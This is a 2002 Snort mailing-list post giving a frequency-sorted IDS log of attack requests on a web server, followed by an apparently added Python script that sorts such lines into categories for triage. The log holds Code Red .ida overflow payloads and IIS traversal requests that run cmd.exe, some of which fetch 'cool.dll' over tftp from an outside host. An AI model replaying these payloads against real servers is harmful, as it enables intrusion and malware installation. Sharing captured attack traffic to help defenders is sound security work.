Snort mailing list archives

Re-affermentain, Opps, I mean re-affirmation of the morons on the net


From: Phil Wood <cpw () lanl gov>
Date: Sat, 9 Feb 2002 20:32:00 -0700

56 minutes of snort web rules alerts starting Sat Feb  9 18:52:57 MST.
The leading number is frequency. (sort file | uniq -c | sort -rn).
Check out the moron that is going to pull down cool.dll.
(No, this was not captured on my home machine.)

   6244 GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
   4999 GET /scripts/..%c../winnt/system32/cmd.exe?/c+dir dir HTTP/1.0
   2514 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir r HTTP/1.0
   1303 GET /scripts/root.exe?/c+dir HTTP/1.0
   1290 GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
   1286 GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
   1279 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir c+dir HTTP/1.0
   1268 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir c+dir HTTP/1.0
   1259 GET /msadc/..%5c../..%5c../..%5c/..55../..c1../../.../winnt/system32/cmd.exe?/c+dir 32/cmd.exe?/c+dir HTTP/1.0
   1237 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir dir HTTP/1.0
   1233 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir c+dir HTTP/1.0
   1228 GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir r HTTP/1.0
     40 GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
      4 GET /scripts/..%c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll \httpodbc.dll HTTP/1.0
      4 GET /scripts/..%c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll \httpodbc.dll HTTP/1.0
      4 GET /scripts/..%c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll \httpodbc.dll HTTP/1.0
      2 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll ttpodbc.dll HTTP/1.0
      2 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll ttpodbc.dll HTTP/1.0
      2 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll ttpodbc.dll HTTP/1.0
      2 GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
      1 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll e:\httpodbc.dll HTTP/1.0
      1 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll d:\httpodbc.dll HTTP/1.0
      1 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll c:\httpodbc.dll HTTP/1.0
      1 GET /scripts/root.exe?/c+tftp -i 172.16.102.254 GET cool.dll httpodbc.dll podbc.dll HTTP/1.0
      1 GET /scripts/debug/HM_ScriptDOM.js HTTP/1.1
      1 GET /scripts/debug/HM_ArraysSiteMapLab_sub.js HTTP/1.1
      1 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll \httpodbc.dll HTTP/1.0
      1 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll e:\httpodbc.dll HTTP/1.0
      1 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll \httpodbc.dll HTTP/1.0
      1 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll d:\httpodbc.dll HTTP/1.0
      1 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll \httpodbc.dll HTTP/1.0
      1 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll c:\httpodbc.dll HTTP/1.0
      1 GET /scripts/..%2f../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll ttpodbc.dll HTTP/1.0
      1 GET /scripts/..%2f../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll ttpodbc.dll HTTP/1.0
      1 GET /scripts/..%2f../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll ttpodbc.dll HTTP/1.0
      1 GET /msadc/..%5c../..%5c../..%5c/..55../..c1../../.../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll 0cool.dll%20e:\httpodbc.dll HTTP/1.0
      1 GET /msadc/..%5c../..%5c../..%5c/..55../..c1../../.../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll 0cool.dll%20d:\httpodbc.dll HTTP/1.0
      1 GET /msadc/..%5c../..%5c../..%5c/..55../..c1../../.../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll 0cool.dll%20c:\httpodbc.dll HTTP/1.0
      1 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll e:\httpodbc.dll HTTP/1.0
      1 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll d:\httpodbc.dll HTTP/1.0
      1 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll c:\httpodbc.dll HTTP/1.0
      1 GET /intranet/pitchang_combined/1day/1997-148.html HTTP/1.0
      1 GET /d/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll podbc.dll HTTP/1.0
      1 GET /d/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll podbc.dll HTTP/1.0
      1 GET /d/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll podbc.dll HTTP/1.0
      1 GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
      1 GET /default.ida?
      1 GET /c/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll podbc.dll HTTP/1.0
      1 GET /c/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll podbc.dll HTTP/1.0
      1 GET /c/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll podbc.dll HTTP/1.0
      1 GET /c

Now for another beer.
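The `sort | uniq -c | sort -rn` pipeline above counts every encoding variant separately, so the one request that matters (the traversal that pulls a file in over tftp) is buried under thousands of `/c+dir` probes. The triage script below is an added example, not code from the post or from Snort: it normalises the `%5c` / `%2f` / backslash variants, buckets each alerted request line as an .ida overflow probe, a cmd.exe/root.exe traversal, or a traversal carrying a tftp fetch, and lists the fetch server and filename. The sample lines are constructed to mirror the post's list, not copied from it.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample lines modelled on the post's frequency list (not its data).
SAMPLE = [
    "GET /default.ida?NNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090 HTTP/1.0",
    "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/root.exe?/c+dir HTTP/1.0",
    "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254"
    " GET cool.dll c:\\httpodbc.dll HTTP/1.0",
    "GET /scripts/debug/HM_ScriptDOM.js HTTP/1.1",
]

REQUEST_RE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<target>.*?)\s+HTTP/\d\.\d$")
TFTP_RE = re.compile(
    r"tftp\s+-i\s+(?P<server>\d{1,3}(?:\.\d{1,3}){3})\s+get\s+(?P<file>\S+)")

def normalize(target):
    """Percent-decode once and fold backslashes so %5c, %2f and \\ compare equal."""
    return unquote(target).replace("\\", "/").lower()

def classify(line):
    """Return (category, detail) for one alerted request line."""
    m = REQUEST_RE.match(line.strip())
    if not m:
        return ("unparsed", None)
    target = normalize(m.group("target"))
    if target.startswith("/default.ida?"):
        # .ida ISAPI overflow probe: long N filler, %u-encoded payload follows
        return ("ida_overflow", "%u" in target)
    if "/winnt/system32/cmd.exe" in target or "/root.exe" in target:
        fetch = TFTP_RE.search(target)
        if fetch:  # traversal used to pull a file in over tftp: the line worth chasing
            return ("cmd_traversal_tftp_fetch", (fetch.group("server"), fetch.group("file")))
        return ("cmd_traversal", target.split("?", 1)[-1])
    return ("other", target)

def summarize(lines):
    """Per-category counts plus the distinct (server, file) pairs fetched over tftp."""
    counts, fetches = Counter(), set()
    for line in lines:
        cat, detail = classify(line)
        counts[cat] += 1
        if cat == "cmd_traversal_tftp_fetch":
            fetches.add(detail)
    return counts, sorted(fetches)

if __name__ == "__main__":
    counts, fetches = summarize(SAMPLE)
    for cat, n in counts.most_common():
        print(f"{n:6d} {cat}")
    for server, name in fetches:
        print(f"tftp fetch of {name} from {server}")
```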
